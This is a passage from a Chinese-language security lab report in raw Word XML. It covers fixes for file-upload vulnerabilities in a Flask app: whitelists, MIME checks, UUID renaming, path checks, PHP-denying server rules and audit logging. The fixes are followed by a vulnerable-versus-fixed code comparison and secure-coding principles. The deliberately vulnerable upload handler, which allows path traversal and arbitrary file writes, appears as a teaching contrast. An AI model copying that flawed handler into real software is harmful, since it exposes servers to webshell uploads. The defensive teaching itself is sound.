    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复1：文件后缀白名单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>对应漏洞1、5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>明确只允许6种图片格式，拒绝所有可执行脚本后缀。后端独立校验，不依赖前端。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ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".webp"}</w:t>
        <w:br/>
        <w:t>ext = os.path.splitext(f.filename)[1].lower()</w:t>
        <w:br/>
        <w:t>if ext not in ALLOWED_EXTENSIONS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "不支持的文件类型"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复2：MIME类型检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>对应漏洞2、5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用python-magic库读取文件头魔数，检测真实文件类型，防止伪造后缀和图片马。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import magic</w:t>
        <w:br/>
        <w:t>mime_type = magic.from_buffer(f.read(2048), mime=True)</w:t>
        <w:br/>
        <w:t>ALLOWED_MIMES = {"image/jpeg","image/png","image/gif","image/bmp","image/webp"}</w:t>
        <w:br/>
        <w:t>if mime_type not in ALLOWED_MIMES:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "文件内容不合法"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复3+8：UUID重命名+路径安全校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>对应漏洞3、4、8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用UUID随机重命名消除用户对文件名的控制。用Path.resolve()校验文件路径在UPLOAD_DIR内。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import uuid</w:t>
        <w:br/>
        <w:t>safe_filename = uuid.uuid4().hex + ext</w:t>
        <w:br/>
        <w:t>safe_path = Path(UPLOAD_DIR).resolve()</w:t>
        <w:br/>
        <w:t>save_path = (safe_path / safe_filename).resolve()</w:t>
        <w:br/>
        <w:t>if not str(save_path).startswith(str(safe_path)):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "文件名不合法"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复4：UUID重命名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>对应漏洞4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>32位随机十六进制字符串作为文件名，彻底防止文件名冲突和覆盖。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safe_filename = uuid.uuid4().hex + ext</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复6：上传目录安全配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>对应漏洞6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>创建.htaccess文件禁止Apache解析PHP。或配置Nginx禁止uploads目录执行脚本。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# Apache .htaccess</w:t>
        <w:br/>
        <w:t>&lt;FilesMatch "\.(php|phtml|php3|php4|php5)$"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Require all denied</w:t>
        <w:br/>
        <w:t>&lt;/FilesMatch&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Nginx配置</w:t>
        <w:br/>
        <w:t>location /static/uploads/ {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    location ~ \.php$ { deny all; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复7：审计日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>对应漏洞7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用Python logging模块记录每次上传的全部关键信息，支持安全事件溯源。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import logging</w:t>
        <w:br/>
        <w:t>audit_logger.info(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    f"上传: 用户={session['username']} "</w:t>
        <w:br/>
        <w:t xml:space="preserve">    f"原始文件={original_name} "</w:t>
        <w:br/>
        <w:t xml:space="preserve">    f"保存为={safe_filename} "</w:t>
        <w:br/>
        <w:t xml:space="preserve">    f"大小={size}字节 MIME={mime_type} "</w:t>
        <w:br/>
        <w:t xml:space="preserve">    f"IP={request.remote_addr}"</w:t>
        <w:br/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.7 上传目录.htaccess自动部署</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在app_fixed.py启动时自动生成.htaccess安全规则：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# 启动时写入安全的.htaccess</w:t>
        <w:br/>
        <w:t>HTACCESS_PATH = os.path.join(UPLOAD_DIR, ".htaccess")</w:t>
        <w:br/>
        <w:t>if not os.path.exists(HTACCESS_PATH):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with open(HTACCESS_PATH, "w") as f:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.write("")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.write("&lt;FilesMatch \\"\.(php|phtml|php3|php4|php5)$\\"&gt;\n")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.write("    Require all denied\n")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.write("&lt;/FilesMatch&gt;\n")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.8 完整修复代码流程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# app_fixed.py 上传路由完整逻辑</w:t>
        <w:br/>
        <w:t>@app.route("/upload", methods=["GET","POST"])</w:t>
        <w:br/>
        <w:t>def upload():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    if request.method == "POST":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f = request.files["file"]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 1. 后缀白名单检查</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ext = os.path.splitext(f.filename)[1].lower()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if ext not in ALLOWED_EXTENSIONS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            audit_logger.warning(f"后缀不合法: {ext}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "不支持的文件类型"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 2. MIME真实类型检测</w:t>
        <w:br/>
        <w:t xml:space="preserve">        mime_type = magic.from_buffer(f.read(2048), mime=True)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.seek(0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if mime_type not in ALLOWED_MIMES:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            audit_logger.warning(f"MIME不合法: {mime_type}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "文件内容不合法"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 3+4. UUID重命名</w:t>
        <w:br/>
        <w:t xml:space="preserve">        safe_filename = uuid.uuid4().hex + ext</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 8. 路径安全校验</w:t>
        <w:br/>
        <w:t xml:space="preserve">        safe_path = Path(UPLOAD_DIR).resolve()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        save_path = (safe_path / safe_filename).resolve()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if not str(save_path).startswith(str(safe_path)):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "文件名不合法"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        f.save(str(save_path))</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 7. 审计日志</w:t>
        <w:br/>
        <w:t xml:space="preserve">        audit_logger.info(f"上传成功: 用户={session['username']} "</w:t>
        <w:br/>
        <w:t xml:space="preserve">            f"文件={safe_filename} MIME={mime_type} IP={request.remote_addr}")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        return "上传成功"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第八章  修复前后代码对比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对比项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有漏洞(app.py)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已修复(app_fixed.py)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color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>对应漏洞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后缀检查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❌ 无检查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白名单 {.jpg,.png等}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漏洞1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MIME检测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❌ 无验证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magic文件头检测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漏洞2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路径穿越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❌ 原始文件名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UUID+Path.resolve()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漏洞3,8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文件重命名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❌ 不重命名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uuid.uuid4().hex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漏洞4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后端校验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❌ 无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独立检测+白名单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漏洞5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目录权限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❌ 无.htaccess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自动生成.htaccess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漏洞6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审计日志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❌ 无日志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✅ logging记录完整审计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漏洞7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞代码（app.py）vs 修复代码（app_fixed.py）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>有漏洞版本（22行）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFEBEE" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@app.route("/upload", methods=["GET","POST"])</w:t>
        <w:br/>
        <w:t>def upload():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if request.method == "POST":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f = request.files["file"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        filename = f.filename  # ⚠️ 原始文件名</w:t>
        <w:br/>
        <w:t xml:space="preserve">        save_path = os.path.join(UPLOAD_DIR, filename)  # ⚠️ 路径穿越</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.save(save_path)  # ⚠️ 任意文件写入</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "上传成功"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E7D32"/>
        </w:rPr>
        <w:t>修复版本（46行）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="E8F5E9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@app.route("/upload", methods=["GET","POST"])</w:t>
        <w:br/>
        <w:t>def upload():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if request.method == "POST":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f = request.files["file"]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 修复1：后缀白名单</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ext = os.path.splitext(f.filename)[1].lower()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if ext not in ALLOWED_EXTENSIONS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "不支持的文件类型"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 修复2：MIME检测</w:t>
        <w:br/>
        <w:t xml:space="preserve">        mime_type = magic.from_buffer(f.read(2048), mime=True)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.seek(0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if mime_type not in ALLOWED_MIMES:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "文件内容不合法"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 修复3+4+8：UUID重命名+路径校验</w:t>
        <w:br/>
        <w:t xml:space="preserve">        safe_filename = uuid.uuid4().hex + ext</w:t>
        <w:br/>
        <w:t xml:space="preserve">        safe_path = Path(UPLOAD_DIR).resolve()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        save_path = (safe_path / safe_filename).resolve()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if not str(save_path).startswith(str(safe_path)):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "文件名不合法"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        f.save(str(save_path))</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        # ✅ 修复7：审计日志</w:t>
        <w:br/>
        <w:t xml:space="preserve">        audit_logger.info(f"上传成功: {session['username']} {safe_filename}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "上传成功"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第九章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过本次实验，我们总结了以下Web安全编码规范：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则一：白名单机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>始终用白名单（明确允许什么）而非黑名单。明确只允许.jpg/.png等图片后缀，而不是禁止.php/.asp。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则二：输入不可信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用户提交的任何数据（文件名、Content-Type、文件内容）都不可信，必须严格验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则三：纵深防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>不要依赖单一防御措施。后缀检查+MIME检测+UUID重命名+目录权限控制，多层次防护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则四：最小权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Web进程不以root运行。上传目录禁执行脚本。数据库用专有账号仅给必要权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则五：安全默认配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>框架安全特性默认开启（Flask的debug=False），敏感信息不硬编码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则六：日志审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有上传操作记录完整日志（用户、文件名、IP、时间、大小），支持安全事件溯源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则七：文件存储隔离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>上传文件存储在Web根目录之外，或使用独立域名/CDN，杜绝脚本执行可能。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>—— 报告结束 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